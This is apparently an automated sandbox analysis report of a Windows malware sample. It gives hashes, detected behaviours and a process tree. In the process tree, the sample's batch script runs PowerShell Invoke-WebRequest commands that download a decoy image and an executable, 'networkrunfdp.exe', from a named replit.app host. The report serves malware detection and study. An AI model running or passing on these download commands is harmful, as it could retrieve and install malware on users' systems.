Analysis
-
max time kernel
121s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
30-07-2024 02:02
Static task
static1
Behavioral task
behavioral1
Sample
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exe
Resource
win7-20240705-en
General
-
Target
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exe
-
Size
288KB
-
MD5
7e900eb50f9dc1cb5c68ffea4b9e7bcc
-
SHA1
4dcc14dc2b98fbc171308fb55b5b8551dd96ea96
-
SHA256
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3
-
SHA512
a77aeffc4f80358940e40789a67f67df5adc1bde4790a400665a98871498b10c3206981d3f18efa1149c9ec246f0343d133dd77de4f5a1f5816506a204276b1a
-
SSDEEP
3072:6q6+ouCpk2mpcWJ0r+QNTBfRuk1qXkXRA4XTZK:6ldk1cWQRNTBpd8t
Malware Config
Signatures
-
Processes:
powershell.exepowershell.exepid process 1944 powershell.exe 2256 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1944 powershell.exe 2256 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 2256 powershell.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.execmd.exedescription pid process target process PID 348 wrote to memory of 1800 348 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exe cmd.exe PID 348 wrote to memory of 1800 348 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exe cmd.exe PID 348 wrote to memory of 1800 348 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exe cmd.exe PID 348 wrote to memory of 1800 348 8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exe cmd.exe PID 1800 wrote to memory of 1944 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 1944 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 1944 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 2256 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 2256 1800 cmd.exe powershell.exe PID 1800 wrote to memory of 2256 1800 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exe"C:\Users\Admin\AppData\Local\Temp\8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:348 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\96F2.tmp\96F3.tmp\96F4.bat C:\Users\Admin\AppData\Local\Temp\8636f8c4fe1fe4859a3feec23a0cecf12391ddbffbb3d2bec5efe8f3aaac74b3.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:1800 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -Command "Invoke-WebRequest 'https://jdvdpconstructionltdfileportal.replit.app/networkrunfdp.exe' -OutFile networkrunfdp.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2256
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
334B
MD59aaac0122442ca0ebb4d8bb795e86676
SHA1594744d8e4d51273dd435c3fac5799bc5f180e8c
SHA2566af7e75e339241dac26eca99aa1290c1f420b45b4231212d20adf08aa287e373
SHA512d08a0dd3b40d80c7582c3f69a7868371e7eb03ac6f4658a39e7a9fb1dd34cc22a5e91d60b31af71c77cebfe0fd0c3827fdbb3cc35224189388345c61e756636c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD57b87af0713f74d263eda086c11cc4fe0
SHA1f16a6d47dcc4951737f94f4ffb94b90736744466
SHA2568bed2f905f5deaf22370af4a8ad79ed3c7cab3ee3550a0eb59ab677cddb49d23
SHA512fea49c2ec87776d8672aafb3804a869893754eb676855437286f85cfe7271f3d538096254eafdb932e747b6367eda0efa32665e270790b1a69455035712cfcfe